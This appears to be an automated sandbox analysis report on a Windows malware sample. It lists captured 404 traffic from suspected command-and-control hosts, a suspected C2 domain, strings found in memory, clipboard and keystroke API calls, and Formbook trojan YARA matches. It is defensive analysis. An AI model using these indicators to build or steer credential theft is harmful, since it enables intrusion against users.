            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=us-ascii | Server: Microsoft-HTTPAPI/2.0 | Date: Fri, 22 Nov 2024 06:49:59 GMT | Connection: close | Content-Length: 315 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Fri, 22 Nov 2024 06:50:02 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 06:51:57 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 06:51:59 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 06:52:02 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 06:52:05 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 06:52:12 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 06:52:15 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 06:52:17 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 06:52:20 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4146974677.00000000058C9000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.empowermedeco.com
            Source: YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4146974677.00000000058C9000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.empowermedeco.com/fo8o/
            Source: netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000003.00000002.4145972280.0000000004A92000.00000004.10000000.00040000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.0000000004322000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: netbtugc.exe, 00000003.00000002.4145972280.0000000004A92000.00000004.10000000.00040000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.0000000004322000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000003.00000002.4143985977.00000000030C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000003.00000002.4143985977.00000000030C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000003.00000002.4143985977.00000000030C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000003.00000002.4143985977.000000000309B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033b
            Source: netbtugc.exe, 00000003.00000002.4143985977.00000000030C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000003.00000003.2008817187.0000000007DDC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000003.00000002.4145972280.00000000050DA000.00000004.10000000.00040000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.000000000496A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.empowermedeco.com/fo8o/?Ml18S=mxnR
            Source: netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: netbtugc.exe, 00000003.00000002.4145972280.000000000476E000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4147607697.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.0000000003FFE000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.0000000003FFE000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_00916B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard | 0_2_00916B0C
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_00916D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard | 0_2_00916D07
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_00902B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState | 0_2_00902B37
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_0092F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW | 0_2_0092F7FF

            E-Banking Fraud

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000001.00000002.1823875661.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1823341522.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4143480328.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4143880613.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4146974677.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4144988043.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.4144911596.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1824475216.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1823875661.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1823341522.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4143480328.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4143880613.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4146974677.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4144988043.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.4144911596.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
